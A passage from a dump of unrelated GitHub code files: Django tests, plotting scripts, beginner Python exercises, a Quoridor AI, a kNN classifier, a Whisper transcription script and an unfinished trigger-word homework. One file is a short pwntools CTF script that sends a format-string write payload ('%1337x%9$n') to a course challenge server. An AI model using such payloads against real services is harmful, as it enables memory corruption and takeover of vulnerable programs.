개수.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73716549287","text":"from unittest import TestCase\nfrom django import VERSION\nfrom .main.models import PizzeriaBar\n\n# under Django 1.11 this fails with\n# django.core.exceptions.FieldError: Local field u'street' in class 'PizzeriaBar' clashes with field of the same name from base class 'Pizzeria'.\n\nclass DocTest(TestCase):\n \n def test_django(self):\n p = PizzeriaBar(name=\"Michaels\", min_age=21, specialty=\"Cheese\",\n pizza_bar_specific_field=\"Doodle\")\n self.assertEqual(p.pizza_bar_specific_field, 'Doodle')\n \n if VERSION[0] == 1 and VERSION[1] == 6:\n self.check_django_16(p)\n elif VERSION[0] == 1 and VERSION[1] > 6:\n self.check_django_17(p)\n else:\n self.fail(\"Unsupported Django version {0}\".format(VERSION))\n\n def check_django_16(self, p):\n \n self.assertEqual(p.name, '')\n\n # The `name` field has not been initialized because\n # it is being inherited from a grand-parent.\n \n def check_django_17(self, p):\n self.assertEqual(p.name, 'Michaels')\n \n \n","repo_name":"lino-framework/book","sub_path":"lino_book/projects/diamond2/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"10396504273","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\ndatos = pd.read_csv('distancias.txt')\ncabeza = datos.columns.tolist()\nhead=int(cabeza[0])\n\n\n\n\n\nplt.hist(datos, bins=10, edgecolor='black')\ny= datos.max().max()\nplt.xlim(0, y+0.01) # Comienza en 0 y termina en el valor máximo de los datos\n\nprint(datos.max().max())\nplt.xlabel('Valores')\nplt.ylabel('Frecuencia')\nplt.title(f'Histograma de las distancias entre puntos con dimension {head} ')\n\n# Muestra el histograma\nplt.show()","repo_name":"GuSt4v0CCAM4/Laboratorio_01_EDA","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70673026728","text":"\"\"\"\n2. create a python file named FlightTicket, and declare the following variables:\n 1. from\n 2. to\n 3. ticketPrice\n\n use concatenation to display the full info of the ticket\n\n ex:\n Given Data:\n from = \"Las Vegas\"\n to = \"McLean\"\n ticket_price = 425.5\n\n Output:\n From Las Vegas to McLean is $425.5\n\"\"\"\n\n# Flight ticket information variables\nlocation = \"Las Vegas\"\ndestination = \"McLean\"\nticket_price = 425.5\n\nprint(\"From \" + location + \" to \" + destination + \" is $\" + str(ticket_price))","repo_name":"AishaGench/Pyton_Bootcamp","sub_path":"practice_tasks1/FlightTicket.py","file_name":"FlightTicket.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9363199993","text":"import numpy as np\nimport matplotlib.pyplot as plt\nx = np.linspace(-10, 10, 300)\ny = []\nfor i in x:\n if np.sin(i) > 0: # 调用sin,cos要使用np.sin,np.cos\n y.append(-1)\n else:\n y.append(1)\ny = np.array(y) # 需要把list转化成array,方便进行矩阵的运算\nplt.plot(x, y)\nplt.show()\n","repo_name":"chucklu/PythonTest","sub_path":"2022/chapter9/examples/test-004.py","file_name":"test-004.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32192463407","text":"fruitCalorie = {\n \"Apple\": 130,\n \"Avocado\": 50,\n \"Banana\": 110,\n \"Cantaloupe\": 50,\n \"Grapefruit\": 60,\n \"Grapes\": 90,\n \"Honeydew \": 50,\n \"Kiwifruit\": 90,\n \"Lemon\": 15,\n \"Lime\": 20,\n \"Nectarine\": 60,\n \"Orange\": 80,\n \"Peach\": 60,\n \"Pear\": 100,\n \"Pineapple\": 50,\n \"Plums\": 70,\n \"Strawberries\": 50,\n \"SweetCherries\": 100,\n \"Tangerine\": 50,\n \"Watermelon\": 80\n}\n\n\ndef getcalorie(fruit):\n global fruitCalorie\n if fruit in fruitCalorie:\n print(f\"Calories: {fruitCalorie[fruit]}\")\n\n\nx = input(\"Fruit: \").split(\" \")\nif len(x) > 1:\n fruit = \"\"\n for i in x:\n fruit += i.capitalize()\nelse:\n fruit = \"\".join(x).capitalize()\n\ngetcalorie(fruit)\n\n\n","repo_name":"Kenneth10112/codes","sub_path":"cs50_python/nutrition/nutrition.py","file_name":"nutrition.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26402402429","text":"import copy\nimport random\n\n\nclass TestAI:\n \"\"\"\n A primitive test AI.\n Looks for an optimal move in terms of the shortest distance for self.\n Can not use walls.\n \"\"\"\n\n # Init does not work(\n # def __int__(self, width=9, height=9):\n # print(\"__int__\")\n # from runner import game\n # self.distances = [[0 for _ in range(game.WIDTH)] for _ in range(game.HEIGHT)]\n # print(self.distances)\n\n def move(self, board, pawns_loc, walls, player):\n \"\"\"Return object to be moved and its coordinates.\"\"\"\n from runner import game\n item = \"pawn\"\n # Get all possible moves and choose which of them that is closer to finish\n available_moves = game.available_moves(board, pawns_loc[player])\n distances = self.map_dist(board, player)\n available_moves.sort(key=lambda cell: distances[cell[0]][cell[1]])\n i, j = available_moves[0]\n return item, None, i, j\n\n def map_dist(self, board, player):\n \"\"\"Mapping distances from every cell to the win side of the board.\"\"\"\n from runner import game\n\n # Matrix for distances\n max_value = game.width * game.height\n distances = [[max_value for j in range(game.width)] for i in range(game.height)]\n\n # Add cells with known distances (first/last row) and add them to the frontier\n if player == 1:\n win_side = 0\n elif player == 2:\n win_side = game.height - 1\n frontier = []\n for j in range(game.width):\n distances[win_side][j] = 0\n frontier.append((win_side, j))\n\n explored = []\n new_frontier = frontier\n while frontier:\n # print(\"frontier: \", frontier)\n # print(\"explored: \", explored)\n frontier = new_frontier\n for cell in frontier.copy():\n i, j = cell[0], cell[1]\n dist = distances[i][j]\n for new_cell in game.available_moves(board, cell, planning=True):\n if new_cell not in frontier and new_cell not in explored:\n i, j = new_cell[0], new_cell[1]\n distances[i][j] = dist + 1\n frontier.append(new_cell)\n explored.append(new_cell)\n frontier.remove(cell)\n explored.append(cell)\n new_frontier = frontier\n\n # print(*distances, sep=\"\\n\", end=\"\\n\")\n # print(type(distances[4][4]))\n return distances\n\n\nclass PrimitiveAI(TestAI):\n \"\"\"\n Looks for an optimal move in terms of the shortest distance (to the finish line)\n with respect to opponent's shortest distance.\n Can use walls.\n \"\"\"\n def move(self, board, pawns_loc, walls, player):\n \"\"\"Return object to be moved and its coordinates.\"\"\"\n print(*board, sep=\"\\n\")\n from runner import game\n if player == 1:\n opponent = 2\n else:\n opponent = 1\n self_i, self_j = pawns_loc[player]\n oppo_i, oppo_j = pawns_loc[opponent]\n rated_moves = []\n available_moves = game.available_moves(board, pawns_loc[player])\n self_distances = self.map_dist(board, player)\n oppo_distances = self.map_dist(board, opponent)\n\n available_moves.sort(key=lambda cell: self_distances[cell[0]][cell[1]])\n i, j = available_moves[0]\n delta = self_distances[i][j] - oppo_distances[oppo_i][oppo_j]\n min_delta = delta\n best_pawn_move = (\"pawn\", (i, j), None, delta)\n rated_moves.append(best_pawn_move)\n\n if not all(wall[\"placed\"] for wall in walls[player]):\n available_walls = game.available_walls(board, pawns_loc, player)\n for wall in available_walls:\n i, j = wall[\"loc\"]\n orientation = wall[\"orientation\"]\n state = copy.deepcopy(board)\n state[i][j][\"wall_origin\"] = True\n state[i][j][\"orientation\"] = orientation\n if orientation == \"horizontal\":\n state[i][j][\"wall_down\"] = True\n state[i][j + 1][\"wall_down\"] = True\n else:\n state[i][j][\"wall_right\"] = True\n state[i + 1][j][\"wall_right\"] = True\n self_dist = self.map_dist(state, player)\n opp_dist = self.map_dist(state, opponent)\n delta = self_dist[self_i][self_j] - opp_dist[oppo_i][oppo_j]\n rated_moves.append((\"wall\", (i, j), orientation, delta))\n if delta < min_delta:\n min_delta = delta\n\n # rated_moves.sort(key=lambda item_loc_rate: item_loc_rate[-1])\n print(rated_moves)\n print(min_delta)\n best_moves = [move for move in rated_moves if move[-1] == min_delta]\n best_move = random.choice(best_moves)\n # best_move = sorted(rated_moves, key=lambda item_loc_rate: item_loc_rate[-1])[0]\n item = best_move[0]\n i, j = best_move[1]\n orientation = best_move[2]\n\n print(*self.map_dist(board, player), sep=\"\\n\", end=\"\\n\")\n\n return item, orientation, i, j\n","repo_name":"YannTyr/Quoridor","sub_path":"AI.py","file_name":"AI.py","file_ext":"py","file_size_in_byte":5176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22214303838","text":"'''\nCreated on Sep 16, 2010\nkNN: k Nearest Neighbors\n\nInput: inX: vector to compare to existing dataset (1xN)\n dataSet: size m data set of known vectors (NxM)\n labels: data set labels (1xM vector)\n k: number of neighbors to use for comparison (should be an odd number)\n\nOutput: the most popular class label\n\n@author: pbharrin\n'''\n\n'''\n k近值算法示例\n'''\nimport matplotlib.pyplot as plt\nimport operator\n\nfrom numpy import *\nfrom numpy.ma.core import *\n\n'''\n使用k近邻算法改进约会网站的配对效果,算法步骤如下:\n(1) 收集数据:提供文本文件。\n(2) 准备数据:使用Python解析文本文件。\n(3) 分析数据:使用Matplotlib画二维扩散图。\n(4) 训练算法:此步骤不适用于k-近邻算法。\n(5) 测试算法:使用海伦提供的部分数据作为测试样本。测试样本和非测试样本的区别在于:测试样本是已经完成分类的数据,如果预测分类与实际类别不同,则标记为一个错误。\n(6) 使用算法:产生简单的命令行程序,然后海伦可以输入一些特征数据以判断对方是否为自己喜欢的类型。\n'''\n\n\ndef dating_class_test():\n hoRatio = 0.50 # hold out 10%\n # 从指定文件中载入数据,载入数据为每年获得的飞行常客里程数,玩视频游戏所耗时间百分比,每周消费的冰淇淋升数\n datingDataMat, datingLabels = file2matrix('datingTestSet2.txt')\n normMat, ranges, minVals = autoNorm(datingDataMat)\n # print(normMat[0:20])\n # print(ranges)\n # print(minVals)\n # exit()\n\n m = normMat.shape[0] # 取矩阵行数,rage函数返回包含行列数的元组对象\n numTestVecs = int(m * hoRatio) # 取测试行数\n errorCount = 0.0\n for i in range(numTestVecs):\n # 取出矩阵每一行,非测试行,非测试行的分类标签\n classifierResult = classify0(normMat[i, :], normMat[numTestVecs:m, :], datingLabels[numTestVecs:m], 3) # 求预测分类值\n print(\"the classifier came back with: %d, the real answer is: %d\" % (classifierResult, datingLabels[i]))\n if (classifierResult != datingLabels[i]): errorCount += 1.0 # 预测分类与实际类别不同,则标记为一个错误\n print(\"the total error rate is: %f, error count is %d\" % (errorCount / float(numTestVecs), errorCount))\n\n\n# 分类器方法,求预测分类值\ndef classify0(inX, dataSet, labels, k):\n dataSetSize = dataSet.shape[0] # 行数\n diffMat = tile(inX, (dataSetSize, 1)) - dataSet # 求出测试样本与非测试样本的差值\n sqDiffMat = diffMat ** 2 # 求方\n sqDistances = sqDiffMat.sum(axis=1) # 行求和\n distances = sqDistances ** 0.5\n sortedDistIndicies = distances.argsort()\n\n classCount = {}\n\n for i in range(k):\n voteIlabel = labels[sortedDistIndicies[i]]\n classCount[voteIlabel] = classCount.get(voteIlabel, 0) + 1\n\n sortedClassCount = sorted(classCount.items(), key=operator.itemgetter(1), reverse=True)\n return sortedClassCount[0][0]\n\n\ndef createDataSet():\n group = array([[1.0, 1.1], [1.0, 1.0], [0, 0], [0, 0.1]])\n labels = ['A', 'A', 'B', 'B']\n return group, labels\n\n\n# 将文本文件转换为NumPy矩阵\n# Input: 文本��件路径\n# Output: 包含训练样本数据的NumPy矩阵和类标签向量\ndef file2matrix(filename):\n fr = open(filename)\n numberOfLines = len(fr.readlines()) # 得到文件行数\n returnMat = zeros((numberOfLines, 3)) # 创建Numpy矩阵并初始化0\n classLabelVector = [] # 初始化分类标签向量,存放文本行中最后一列分类标签\n fr = open(filename)\n index = 0\n for line in fr.readlines():\n line = line.strip() # 去除回车符\n listFromLine = line.split('\\t')\n returnMat[index, :] = listFromLine[0:3] # 给矩阵填值\n classLabelVector.append(int(listFromLine[-1])) # 取出最后一个字段作为标签值存入向量对象\n index += 1\n return returnMat, classLabelVector\n\n\n# 归一化特征值,即将飞行公里数值转化为[0,1]区间值\n# newValue = (oldValue-min)/(max-min)\n# dataset: NumPy矩阵\n# 返回值:归一化的numPy矩阵, 最大最小飞行公里数的差值行, 最小矩阵行\ndef autoNorm(dataSet):\n minVals = dataSet.min(0)\n maxVals = dataSet.max(0)\n ranges = maxVals - minVals # 取最大最小飞行公里数的差值\n normDataSet = zeros(shape(dataSet))\n m = dataSet.shape[0]\n normDataSet = dataSet - tile(minVals, (m, 1)) # 矩阵每一行都与最小矩阵行做差值运算\n normDataSet = normDataSet / tile(ranges, (m, 1)) # element wise divide,上一步计算出的矩阵每一行去除最大最小插值矩阵\n return normDataSet, ranges, minVals\n\n\n\n\n# 读取NumPy矩阵格式的特征值,显示为散列图\ndef test1():\n datingDataMat, datingLabels = file2matrix('datingTestSet2.txt')\n print(datingDataMat[0:20])\n print(datingLabels[0:20])\n fig = plt.figure()\n ax = fig.add_subplot(111)\n # ax.scatter(datingDataMat[:, 1], datingDataMat[:, 2], 15.0 * array(datingLabels), 15.0 * array(datingLabels)) # 玩视频游戏所占百分比,每周消耗的冰淇淋升数\n # plt.show()\n ax.scatter(datingDataMat[:, 0], datingDataMat[:, 1], 15.0 * array(datingLabels), 15.0 * array(datingLabels)) # 玩视频游戏所占百分比,每周消耗的冰淇淋升数\n plt.show()\n\ndef test2():\n datingDataMat, datingLabels = file2matrix('datingTestSet2.txt')\n normMat, ranges, minVals = autoNorm(datingDataMat)\n print(normMat)\n print(minVals)\n print(ranges)\n print(normMat.shape)\n\n\n# print(\"========================================================\")\n# test1()\n# print(\"========================================================\")\n# test2()\n\ndating_class_test()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"uncarman2017/MLBeginner","sub_path":"Ch02/kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":5796,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33190372707","text":"import os\nfrom glob import glob\n\n__all__ = ['doc_inherit']\n\n\ndef doc_inherit(base_class, base_method=None):\n \"\"\"\n Docstring inheriting method descriptor.\n\n doc_inherit decorator\n\n Usage:\n\n .. code-block:: python\n\n class Foo(object):\n def foo(self):\n \"Frobber\"\n pass\n\n class Bar(Foo):\n @doc_inherit(Foo)\n def foo(self):\n pass\n\n Now, ``Bar.foo.__doc__ == Bar().foo.__doc__ == Foo.foo.__doc__ ==\n \"Frobber\"``\n \"\"\"\n\n def decorator(method):\n \"\"\"Overwrite method docstring.\"\"\"\n # check whether the method exists\n if base_method is None:\n overridden = getattr(base_class, method.__name__, None)\n else:\n overridden = getattr(base_class, base_method, None)\n if overridden is None:\n raise AttributeError('Can\\'t find method \\'%s\\' in base class.')\n # change docstring\n method.__doc__ = overridden.__doc__\n return method\n\n return decorator\n","repo_name":"theochem/chemtools","sub_path":"chemtools/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"32806213742","text":"from pwn import *\nBINARY = ['./chall']\nIP, PORT = 'ctf99.cs.ui.ac.id', 10009\nLOCAL = True\nDEBUG = False\nif LOCAL:\n if DEBUG:\n p = gdb.debug(BINARY, '''\n b *main+110\n b *main+132\n b *main+148\n ''')\n else:\n p = process(BINARY)\nelse:\n p = remote(IP, PORT)\nif not LOCAL:\n print(p.recv()) # Weird behaviour from the server\ntarget = \"we dont know dumbass\"\npayload = b'%1337x%9$n'\n# payload = b'A'*11 + b'%6$p'\nprint(f\"Payload length is: {len(payload)}\")\nprint(p.recv())\np.sendline(payload)\nprint(p.recvline().decode())\nprint(p.recvline())\np.close()\n","repo_name":"valordra/ctf99_tools","sub_path":"Week 4/format-string-hard/payload.py","file_name":"payload.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7044780454","text":"from transformers import pipeline\r\nimport librosa\r\nimport torch\r\n\r\ndevice = 'cuda:0' if torch.cuda.is_available() else 'cpu'\r\n\r\n# load model and processor\r\nmodel_name = \"openai/whisper-small\"\r\npipe = pipeline(\r\n \"automatic-speech-recognition\",\r\n model=model_name,\r\n chunk_length_s=30,\r\n device=device,\r\n max_new_tokens=448,\r\n)\r\n\r\ndef recognize(filepath=\"output.wav\"):\r\n speech_array, sampling_rate = librosa.load(filepath, sr=16_000)\r\n prediction = pipe(speech_array)[\"text\"]\r\n return prediction\r\n # we can also return timestamps for the predictions\r\n # prediction = pipe(speech_array, return_timestamps=True)[\"chunks\"]\r\n # print(prediction)\r\n\r\nif __name__ == \"__main__\":\r\n print(\"recognizing...\")\r\n print(recognize())","repo_name":"rnishiura/speech-chatgpt","sub_path":"recognizer.py","file_name":"recognizer.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42732566662","text":"# -*- coding: utf-8 -*-#\r\n# -------------------------------------------------------------------------------\r\n# Name: C5_W3_HomeWork_Part2\r\n# Description: 本作业完成了语音关键字触发检测系统的构建\r\n# 1. 前一大部分都是关于输入数据的处理\r\n# 一般处理声音数据,都是固定采样序列,将例如10s的输入分割为多少份,然后每一份的44100频率表示了声音的特征\r\n# 然后根据这个特征进行滑动窗口转换来计算频谱图,因此着这份作业中,输入的音频数据\r\n# 在时间长度上 从10s 采样为Tx = 5511\r\n# 声音的特征 从44100 通过傅里叶频谱变换 转换为 101个频率的声音上来\r\n# 因此输入的X = (batchsize , 5511, 101)\r\n# 然后经过一系列的随机插入,overlap检测,标签更新,我们能够人工合成满足题意的数据集\r\n# 2. 在完成数据集处理之后,我们通过构建模型,模型结构参看Model.png,然后导入已经训练好的h5参数,\r\n# 最终完成了关键字检测\r\n# Author: Administrator\r\n# Date: 2021/1/15\r\n# Last Modified data: 2021年1月19日\r\n# -------------------------------------------------------------------------------\r\n# 导入必要环境\r\nimport numpy as np\r\nfrom pydub import AudioSegment\r\nimport matplotlib.pyplot as plt\r\nimport random\r\nimport sys\r\nimport io\r\nimport os\r\nimport glob\r\nimport IPython\r\nfrom C5_W3_HomeWork_Part2_DataSet.td_utils import *\r\n\r\n# 试听一些数据集音频\r\n# \"activate\"目录包含人们说\"activate\"一词的正面示例。\r\n# \"negatives\"目录包含人们说\"activate\"以外的随机单词的否定示例。每个音频记录只有一个字。\r\n# \"backgrounds\"目录包含10秒的不同环境下的背景噪音片段。\r\n# 由于pycharm相关的支持工作并不完善,在pycharm中无法听取,但是在Jupyterbook中是可以的\r\n\r\nIPython.display.Audio(r\"C5_W3_HomeWork_Part2_DataSet/raw_data/activates/1.wav\")\r\nIPython.display.Audio(r\"C5_W3_HomeWork_Part2_DataSet/raw_data/activates/1.wav\")\r\nIPython.display.Audio(r\"C5_W3_HomeWork_Part2_DataSet/raw_data/backgrounds/1.wav\")\r\n\r\n# 从录音到频谱图\r\n# 从音频的这种“原始”表示中很难弄清是否说了\"activate\"这个词。\r\n# 为了帮助你的序列模型更轻松地学习检测触发词,我们将计算音频的spectrogram。\r\n# 频谱图告诉我们音频片段在某个时刻存在多少不同的频率。\r\n\r\n# 将音频文件切换为数据\r\nx = graph_spectrogram(r\"C5_W3_HomeWork_Part2_DataSet/audio_examples/example_train.wav\")\r\n_, data = wavfile.read(r\"C5_W3_HomeWork_Part2_DataSet/audio_examples/example_train.wav\")\r\n# print(\"Time steps in audio recording before spectrogram\", data[:,0].shape)\r\n# print(\"Time steps in input after spectrogram\", x.shape)\r\n# Time steps in audio recording before spectrogram (441000,)\r\n# Time steps in input after spectrogram (101, 5511)\r\n# 通过以上输出,我们可以得出,整个转换后频谱图为5511个时间单元,每个时间单元一共有101中可能输出\r\n# 对应之前的单词模型,Tx = 5511, MAX_SENTENCE_LENGTH = 101\r\n\r\n# 定义超参数 为全局变量\r\nTx = 5511\r\nn_freq = 101\r\nTy = 1375\r\n\r\n# 合成单个训练示例\r\n# 由于语音数据很难获取和标记,因此你将使用激活,否定和背景的音频片段来合成训练数据。\r\n# 录制很多带有随机\"activates\"内容的10秒音频剪辑非常慢。取而代之的是,\r\n# 录制许多肯定词和否定词以及分别记录背景噪音(或从免费的在线资源下载背景噪音)会变得更加容易。\r\n\r\nactivates, negatives, backgrounds = load_raw_audio()\r\n# print(\"background len: \" + str(len(backgrounds[0])))\r\n# # Should be 10,000, since it is a 10 sec clip\r\n# print(\"activate[0] len: \" + str(len(activates[0])))\r\n# # Maybe around 1000, since an \"activate\" audio clip is usually around 1 sec (but varies a lot)\r\n# print(\"activate[1] len: \" + str(len(activates[1])))\r\n# # Different \"activate\" clips can have different lengths\r\n\r\n# 完成上一步之后,你就获得了所有在原始数据中存储的active,positive和背景数据\r\n# 下面如何进行覆盖,也就是在背景中的某一段,覆盖为active,positive相关的音频,但是依然要保证最终的输出时间为10s\r\n# 当插入或覆盖\"activate\"剪辑时,还将更新yt的标签,以便输出的该时刻之后的50个步骤标记为具有\r\n# 目标标签1。你将训练GRU来检测何时某人完成说\"activate\"。例如,假设合成的\"activate\"剪辑在\r\n# 10秒音频中的5秒标记处结束(恰好在剪辑的一半处)。回想一下 ,由于设定超参数Ty = 1375,\r\n# 因此时间步长 687 = 1375 * 0.5 对应音频的5秒时刻,此时你将设置 Y688 = 1,实际上考虑\r\n# 到实际中的应用,10s的1375份中的一份标记为1实在是过于短暂,因此实际操作中\r\n# 我们将标签之后的50个连续值设置为1。我们有。y688 = y689 = y690 = …… = y737 = 1\r\n\r\n# 要实现合成训练集过程,你将使用以下帮助函数。所有这些函数将使用1ms的离散时间间隔,\r\n# 因此将10秒的音频离散化为10,000步。\r\n\r\n# 函数 get_random_time_segment(segment_ms)返回一个随机的时间段,\r\n# 我们可以在其中插入持续时间为segment_ms的音频片段。 通读代码以确保你了解它在做什么。\r\ndef get_random_time_segment(segment_ms):\r\n \"\"\"\r\n Gets a random time segment of duration segment_ms in a 10,000 ms audio clip.\r\n\r\n Arguments:\r\n segment_ms -- the duration of the audio clip in ms (\"ms\" stands for \"milliseconds\")\r\n\r\n Returns:\r\n segment_time -- a tuple of (segment_start, segment_end) in ms\r\n \"\"\"\r\n\r\n segment_start = np.random.randint(low=0, high=10000 - segment_ms) # Make sure segment doesn't run past the 10sec background\r\n segment_end = segment_start + segment_ms - 1\r\n\r\n return (segment_start, segment_end)\r\n\r\n# 接下来,假设你在(1000,1800)和(3400,4500)段插入了音频剪辑。\r\n# 即第一个片段开始于1000步,结束于1800步。\r\n# 现在,如果我们考虑在(3000,3600)插入新的音频剪辑,这是否与先前插入的片段之一重叠?\r\n# 在这种情况下,(3000,3600)和(3400,4500)重叠,因此我们应该决定不要在此处插入片段。\r\n\r\n# 出于此函数的目的,将(100,200)和(200,250)定义为重叠,因为它们在时间步200处重叠。\r\n# 但是,(100,199)和(200,250)是不重叠的。\r\n\r\n# 实现is_overlapping(segment_time,existing_segments)\r\n# 来检查新的时间段是否与之前的任何时间段重叠。你需要执行2个步骤:\r\n# 1. 创建一个“False”标志,如果发现有重叠,以后将其设置为“True”。\r\n# 2. 循环遍历previous_segments的开始和结束时间。\r\n# 将这些时间与细分的开始时间和结束时间进行比较。4\r\n# 如果存在重叠,请将(1)中定义的标志设置为True。\r\n\r\ndef is_overlapping(segment_time, previous_segments):\r\n \"\"\"\r\n Checks if the time of a segment overlaps with the times of existing segments.\r\n\r\n Arguments:\r\n segment_time -- a tuple of (segment_start, segment_end) for the new segment\r\n previous_segments -- a list of tuples of (segment_start, segment_end) for the existing segments\r\n\r\n Returns:\r\n True if the time segment overlaps with any of the existing segments, False otherwise\r\n \"\"\"\r\n\r\n for elements in previous_segments:\r\n if(elements[1] >= segment_time[0] and elements[0] <= segment_time[0]) or (elements[1] >= segment_time[1] and elements[0] <= segment_time[1]):\r\n break\r\n else:\r\n return False\r\n return True\r\n\r\n# Test OK!\r\n# overlap1 = is_overlapping((950, 1430), [(2000, 2550), (260, 949)])\r\n# overlap2 = is_overlapping((2305, 2950), [(824, 1532), (1900, 2305), (3424, 3656)])\r\n# print(\"Overlap 1 = \", overlap1)\r\n# print(\"Overlap 2 = \", overlap2)\r\n\r\n# 现在,让我们使用以前的辅助函数在10秒钟的随机时间将新的音频片段插入到背景中,\r\n# 但是要确保任何新插入的片段都不会与之前的片段重叠。\r\n\r\n# 练习:实现insert_audio_clip()以将音频片段叠加到背景10秒片段上。你将需要执行4个步骤:\r\n#\r\n# 1. 以ms为单位获取正确持续时间的随机时间段。\r\n# 2. 确保该时间段与之前的任何时间段均不重叠。如果重叠,则返回步骤1并选择一个新的时间段。\r\n# 3. 将新时间段添加到现有时间段列表中,以便跟踪你插入的所有时间段。\r\n# 4. 使用pydub在背景上覆盖音频片段。我��已经为你实现了这一点。\r\n\r\n\r\ndef insert_audio_clip(background, audio_clip, previous_segments):\r\n \"\"\"\r\n Insert a new audio segment over the background noise at a random time step, ensuring that the\r\n audio segment does not overlap with existing segments.\r\n\r\n Arguments:\r\n background -- a 10 second background audio recording.\r\n audio_clip -- the audio clip to be inserted/overlaid.\r\n previous_segments -- times where audio segments have already been placed\r\n\r\n Returns:\r\n new_background -- the updated background audio\r\n \"\"\"\r\n segment_ms = len(audio_clip)\r\n # 获取要插入的audio_clip长度\r\n\r\n segment_time = get_random_time_segment(segment_ms)\r\n # 随机得到一个能够插入上述segment_ms的元组 分别代表插入的起始位置\r\n\r\n # 不断随机,知道找到能够插入其中,而且不会覆盖的区间\r\n while(is_overlapping(segment_time,previous_segments)):\r\n segment_time = get_random_time_segment(segment_ms)\r\n\r\n # 将新插入的区间更新进入previous_segments 方便后续调用\r\n previous_segments.append(segment_time)\r\n\r\n # 将audio_clip插入到指定开始位置\r\n new_background = background.overlay(audio_clip,position = segment_time[0])\r\n\r\n return new_background,segment_time\r\n\r\n# Test OK!\r\n# np.random.seed(5)\r\n# audio_clip, segment_time = insert_audio_clip(backgrounds[0], activates[0], [(3790, 4400)])\r\n# print(\"Segment Time: \", segment_time)\r\n\r\n# 最后,假设你刚刚插入了\"activate.\" ,则执行代码以更新标签yt。\r\n# 在下面的代码中,由于Ty = 1375,所以y是一个 (1,1375)维向量。\r\n\r\n# 但是注意 如果\"activate\"在时间步骤结束,则设置以及最多49个其他连续值。但是,请确保你没有用完数组的末尾并尝试更新 y[0][1375],由于,所以有效索引是 y[0][0] 至y[0][1374]。\r\n# 因此,如果\"activate\" 在1370步结束,则只会得到y[0][1371] = y[0][1372] = y[0][1373] = y[0][1374] = 1\r\n\r\ndef insert_ones(y, segment_end_ms):\r\n \"\"\"\r\n Update the label vector y. The labels of the 50 output steps strictly after the end of the segment\r\n should be set to 1. By strictly we mean that the label of segment_end_y should be 0 while, the\r\n 50 followinf labels should be ones.\r\n\r\n\r\n Arguments:\r\n y -- numpy array of shape (1, Ty), the labels of the training example\r\n segment_end_ms -- the end time of the segment in ms\r\n\r\n Returns:\r\n y -- updated labels\r\n \"\"\"\r\n # 由于segment_end_ms是以10000步为10s 计算的结尾,因此\r\n # 1. 将segment_end_ms转换为对应Ty = 1375的开始位置\r\n segment_end_y = int(segment_end_ms * Ty / 10000.0)\r\n\r\n # 2. 将从segment_end_y+1 开始的之后50步骤全部设定为1\r\n if (Ty - segment_end_y >= 51):\r\n y[:,segment_end_y+1:segment_end_y+51:] = 1\r\n else:\r\n y[:, segment_end_y + 1:Ty:] = 1\r\n return y\r\n\r\n\r\n\r\n# Test OK!\r\n# plt.clf()\r\n# arr1 = insert_ones(np.zeros((1, Ty)), 9700)\r\n# arr1 = insert_ones(arr1, 4251)\r\n# # print (arr1.max(),arr1.min())\r\n# plt.plot(arr1[0,:])\r\n# plt.show()\r\n#\r\n# # plt.show()\r\n# print(\"sanity checks:\", arr1[0][0],arr1[0][1],arr1[0][1374],arr1[0][1333],arr1[0][1334],arr1[0][1335], arr1[0][634], arr1[0][635])\r\n\r\n# 完成上面所有步骤后,我们已经可以从随机的数据中抽取样例,然后和背景10s进行融合,最终得到\r\n# 训练用的Tx片段,和标记着正确输出的Ty片段\r\n\r\n# 练习:实现create_training_example()。你需要执行以下步骤:\r\n#\r\n# 1. 将标签向量初始化为维度为的零numpy数组,shape为(1, Ty)\r\n# 2. 将现有段的集合初始化为一个空列表\r\n# 3. 随机选择0到4个\"activate\"音频剪辑,并将其插入10秒剪辑中。还要在标签向量的正确位置插入标签。\r\n# 4. 随机选择0到2个负音频片段,并将其插入10秒片段中。\r\n\r\ndef create_training_example(background, activates, negatives):\r\n \"\"\"\r\n Creates a training example with a given background, activates, and negatives.\r\n\r\n Arguments:\r\n background -- a 10 second background audio recording\r\n activates -- a list of audio segments of the word \"activate\"\r\n negatives -- a list of audio segments of random words that are not \"activate\"\r\n\r\n Returns:\r\n x -- the spectrogram of the training example\r\n y -- the label at each time step of the spectrogram\r\n \"\"\"\r\n # 设定随机数种子\r\n np.random.seed(18)\r\n\r\n # 直接将背景减少一定数值,用于减轻背景音量\r\n background = background - 20\r\n\r\n # 1. 初始化Ty输出\r\n y = np.zeros(shape = [1, Ty])\r\n\r\n #2. 初始化一个包含现有插入序列起始位置的列表\r\n previous_segments = []\r\n\r\n #3. 随机选择0到4个activate音频,插入10s背景中,并更新y和previous_segments\r\n number_of_activates = np.random.randint(0, 5) # 随机选取个数\r\n random_indices = np.random.randint(len(activates), size=number_of_activates) # 在指定范围内,随机选取个数个的数字\r\n random_activates = [activates[i] for i 